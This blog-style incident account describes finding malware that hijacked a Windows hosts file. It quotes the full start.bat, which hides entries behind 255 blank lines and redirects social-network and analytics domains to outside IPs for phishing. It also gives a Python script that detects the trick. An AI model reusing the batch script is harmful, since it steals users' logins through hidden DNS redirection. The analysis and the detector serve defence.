An exciting adventure happens on your computer quite unexpectedly and, as a rule, at the most inconvenient moment. It all starts simply: you go to your favourite site or social network and discover something unusual ...
That is how it was with my computer. I go to a site and see an indecent picture in the left corner (an advertising banner). Two thoughts flashed through my head:
- my browser is infected
- the site is infected
After wandering through several other sites and not seeing this banner anywhere else, I concluded that it was the site that was infected. Since this was the site of a fairly large company, I called their tech support. They listened, thanked me for my vigilance, but during the conversation said that they did not display this banner in any browser.
Site analysis
I began to examine the site and saw that the Yandex Metrica code contains a line like this:
<noscript><div><img src="//mc.yandex.ru/watch/image2.jpg" style="position:absolute; ..." alt=""></div></noscript>
It is this line that shows the banner. It is not entirely clear how this is done inside the tag, but it is clear that the image link is a phishing one.
Hosts file
Go to the hosts file (%windir%\system32\drivers\etc\hosts).
And here I made a serious mistake: I opened it, looked, saw that everything was in order, and closed it. But I paid no attention to the scroll bar that had appeared.
Startup
Go to startup (Start -> Run -> msconfig) and find there the file start.bat with the following contents:
FOR /L %%i IN (1,1,255) DO echo. >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%\system32\drivers\etc\hosts.txt
It becomes clear that the first line of the batch file appends 255 blank lines to hosts. That is why, looking into hosts, I saw nothing: it was necessary to scroll to the very end to notice the modification.
Thus, on every site that used Google Analytics or Yandex Metrica, this ad banner appeared. And every social network was replaced by a phishing site, where you could easily hand access to your page to the "enemy".
It was enough to remove the batch file from startup and clean hosts, and everything fell into place. How the pest got onto the computer remained a mystery.
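Both halves of this trick, the wall of blank lines that hides the appended entries and the redirection of analytics and social-network hostnames to a foreign address, are easy to check for mechanically. The script below is an added example and is not part of the original post: it parses a hosts file, reports the longest run of blank lines, and classifies every mapping into loopback sinkholes (blocked names), hijacks of names on a watchlist, and other redirects for manual review. The sample hosts content is constructed to mirror the batch file above (255 blank lines, then the appended entries), and the watchlist is an assumption built from the domains the post names; replace it with the names that matter in your own environment.

```python
"""Audit a Windows hosts file for the blank-line padding and hijack patterns."""
from ipaddress import ip_address

# Constructed sample hosts file modelled on the trick in the post: a normal
# header, then 255 blank lines pushed in by the batch file, then the real
# modifications appended at the very end where a quick glance will not see them.
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\n"
    "#\n"
    "# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n"
    "#\t127.0.0.1       localhost\n"
    + "\n" * 255
    + "127.0.0.1 obhodilka.ru raskruty.ru jelya.ru\n"
    + "46.251.249.137 m.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com\n"
    + "46.251.249.136 mc.yandex.ru www.google-analytics.com\n"
)

# Hostnames we never expect the hosts file to resolve at all. This list is an
# assumption built from the domains named in the post; adapt it to your environment.
WATCHLIST = {
    "vk.com", "m.vk.com", "odnoklassniki.ru", "m.odnoklassniki.ru",
    "my.mail.ru", "mc.yandex.ru", "www.google-analytics.com",
}


def parse_hosts(text):
    """Return (line_number, ip, [hostnames]) for every active mapping.

    Comments (after '#') and blank lines are skipped. The line number is kept
    so that a finding can be located in a file padded with blank lines.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ip_address(fields[0])
        except ValueError:
            continue  # not an address: ignore malformed lines
        entries.append((lineno, str(ip), fields[1:]))
    return entries


def longest_blank_run(text):
    """Length of the longest run of consecutive blank lines.

    A normal hosts file has at most a handful; a run of hundreds is the
    padding trick that pushes appended lines below the visible window.
    """
    longest = current = 0
    for raw in text.splitlines():
        if raw.strip() == "":
            current += 1
            longest = max(longest, current)
        else:
            current = 0
    return longest


def audit_hosts(text, watchlist=WATCHLIST, max_blank_run=10):
    """Classify every mapping and flag the padding trick.

    Returns a dict with:
      padding   - longest blank run if it exceeds max_blank_run, else 0
      hijacked  - watchlist names mapped to a non-loopback address
      sinkholed - names mapped to loopback (blocked, possibly on purpose)
      redirects - every other non-loopback mapping, for manual review
    """
    report = {"padding": 0, "hijacked": [], "sinkholed": [], "redirects": []}
    run = longest_blank_run(text)
    if run > max_blank_run:
        report["padding"] = run
    for lineno, ip, names in parse_hosts(text):
        loopback = ip_address(ip).is_loopback
        for name in names:
            if loopback:
                report["sinkholed"].append((lineno, name))
            elif name.lower() in watchlist:
                report["hijacked"].append((lineno, name, ip))
            else:
                report["redirects"].append((lineno, name, ip))
    return report


if __name__ == "__main__":
    rep = audit_hosts(SAMPLE_HOSTS)
    if rep["padding"]:
        print(f"[!] {rep['padding']} consecutive blank lines: padding trick")
    for lineno, name, ip in rep["hijacked"]:
        print(f"[!] line {lineno}: {name} hijacked to {ip}")
    for lineno, name in rep["sinkholed"]:
        print(f"[-] line {lineno}: {name} -> loopback (blocked)")
```

To run it against a real machine, read %windir%\system32\drivers\etc\hosts into a string and pass it to audit_hosts instead of SAMPLE_HOSTS. Loopback entries are reported separately because ad-blocking tools legitimately write them; the entries worth attention are the watchlist names pointed at an outside address and any large blank run, which has no honest reason to exist.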
Conclusion
In this whole story, the following remains surprising:
- The computer had Kaspersky Anti-Virus installed, which showed no sign of resisting the modification of the hosts file, the addition of a batch file to startup, or the appearance of the banner (even after a full scan).
- Windows 7 quite calmly allowed start.bat to run on every boot.